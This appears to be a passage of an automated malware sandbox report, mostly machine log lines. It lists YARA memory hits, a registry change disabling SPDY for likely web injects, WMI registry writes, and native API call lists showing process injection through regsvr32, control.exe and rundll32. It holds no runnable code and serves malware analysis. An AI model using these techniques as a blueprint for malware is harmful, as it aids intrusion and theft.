            Source: Yara matchFile source: 00000020.00000002.519882408.0000026754D05000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 6968, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4360, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4760, type: MEMORY
            Disables SPDY (HTTP compression, likely to perform web injects)Show sources
            Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\183C.bin\Root.pfx
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\183C.bin\AuthRoot.pfx

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04A864BF NtMapViewOfSection,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04A84093 GetProcAddress,NtCreateSection,memset,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04A89E28 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04A8B2CD NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0493029D NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0493009C NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04930066 NtAllocateVirtualMemory,
            Source: C:\Windows\System32\control.exeCode function: 31_2_006B88E0 NtQueryInformationToken,NtQueryInformationToken,NtClose,
            Source: C:\Windows\System32\control.exeCode function: 31_2_006B1920 NtReadVirtualMemory,
            Source: C:\Windows\System32\control.exeCode function: 31_2_006A6104 NtQueryInformationProcess,
            Source: C:\Windows\System32\control.exeCode function: 31_2_006A91C0 NtQueryInformationProcess,
            Source: C:\Windows\System32\control.exeCode function: 31_2_006BA9D8 NtWriteVirtualMemory,
            Source: C:\Windows\System32\control.exeCode function: 31_2_006BDE98 NtAllocateVirtualMemory,
            Source: C:\Windows\System32\control.exeCode function: 31_2_006BD748 NtMapViewOfSection,
            Source: C:\Windows\System32\control.exeCode function: 31_2_006B7B34 NtCreateSection,
            Source: C:\Windows\System32\control.exeCode function: 31_2_006BEB10 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,
            Source: C:\Windows\System32\control.exeCode function: 31_2_006B67C8 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,
            Source: C:\Windows\System32\control.exeCode function: 31_2_006D900A NtProtectVirtualMemory,NtProtectVirtualMemory,
            Source: C:\Windows\System32\control.exeCode function: 31_2_006D936C NtProtectVirtualMemory,
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FC91C0 NtQueryInformationProcess,
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FD88E0 NtQueryInformationToken,NtQueryInformationToken,NtClose,
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FF900A NtProtectVirtualMemory,NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04A8B0AC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04A88534
            Source: C:\Windows\System32\control.exeCode function: 31_2_006B2A04
            Source: C:\Windows\System32\control.exeCode function: 31_2_006A932C
            Source: C:\Windows\System32\control.exeCode function: 31_2_006B67C8
            Source: C:\Windows\System32\control.exeCode function: 31_2_006BF06C
            Source: C:\Windows\System32\control.exeCode function: 31_2_006BCC1C
            Source: C:\Windows\System32\control.exeCode function: 31_2_006B64DC
            Source: C:\Windows\System32\control.exeCode function: 31_2_006BC8A8
            Source: C:\Windows\System32\control.exeCode function: 31_2_006BCC80
            Source: C:\Windows\System32\control.exeCode function: 31_2_006A3498
            Source: C:\Windows\System32\control.exeCode function: 31_2_006B909C
            Source: C:\Windows\System32\control.exeCode function: 31_2_006B096B
            Source: C:\Windows\System32\control.exeCode function: 31_2_006C117C
            Source: C:\Windows\System32\control.exeCode function: 31_2_006C654C
            Source: C:\Windows\System32\control.exeCode function: 31_2_006A8D2C
            Source: C:\Windows\System32\control.exeCode function: 31_2_006B051C
            Source: C:\Windows\System32\control.exeCode function: 31_2_006AFDD8
            Source: C:\Windows\System32\control.exeCode function: 31_2_006C31A4
            Source: C:\Windows\System32\control.exeCode function: 31_2_006AA1A0
            Source: C:\Windows\System32\control.exeCode function: 31_2_006B4670
            Source: C:\Windows\System32\control.exeCode function: 31_2_006B2648
            Source: C:\Windows\System32\control.exeCode function: 31_2_006A964C
            Source: C:\Windows\System32\control.exeCode function: 31_2_006C7228
            Source: C:\Windows\System32\control.exeCode function: 31_2_006BC224
            Source: C:\Windows\System32\control.exeCode function: 31_2_006B0EC4
            Source: C:\Windows\System32\control.exeCode function: 31_2_006C7EDC
            Source: C:\Windows\System32\control.exeCode function: 31_2_006A7ED8
            Source: C:\Windows\System32\control.exeCode function: 31_2_006A4AA0
            Source: C:\Windows\System32\control.exeCode function: 31_2_006AA6A4
            Source: C:\Windows\System32\control.exeCode function: 31_2_006AB2A4
            Source: C:\Windows\System32\control.exeCode function: 31_2_006C5A88
            Source: C:\Windows\System32\control.exeCode function: 31_2_006B3A9C
            Source: C:\Windows\System32\control.exeCode function: 31_2_006A5B40
            Source: C:\Windows\System32\control.exeCode function: 31_2_006C6BDC
            Source: C:\Windows\System32\control.exeCode function: 31_2_006BF7D4
            Source: C:\Windows\System32\control.exeCode function: 31_2_006C4FA8
            Source: C:\Windows\System32\control.exeCode function: 31_2_006A6380
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FD2A04
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FC932C
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FE5A88
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FD4670
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FC964C
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FD2648
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FE7228
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FDC224
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FCFDD8
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FE31A4
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FCA1A0
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FE117C
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FD096B
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FE654C
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FC8D2C
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FD051C
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FD64DC
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FDC8A8
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FD909C
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FC3498
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FDCC80
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FDF06C
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FDCC1C
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FE6BDC
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FDF7D4
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FD67C8
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FE4FA8
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FC6380
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FC5B40
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FE7EDC
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FC7ED8
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FD0EC4
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FCA6A4
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FCB2A4
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FC4AA0
            Source: C:\Windows\System32\rundll32.exeCode function: 34_2_0000024E31FD3A9C
            Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 728
            Source: vnaSKDMnLG.dllStatic PE information: invalid certificate
            Source: q3xypckz.dll.24.drStatic PE information: No import functions for PE file found
            Source: chv50z53.dll.26.drStatic PE information: No import functions for PE file found
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: @ .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ? .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: > .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: = .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: < .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ; .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: : .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 9 .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 8 .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 7 .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 6 .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 5 .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 4 .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 3 .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 2 .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 1 .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 0 .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: - .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: , .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: + .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: * .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ) .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ( .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: & .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: % .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: $ .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: # .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ! .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ~ .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: } .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: | .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: { .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: c .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: b .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: a .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ` .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: _ .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ^ .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ] .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: [ .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dll
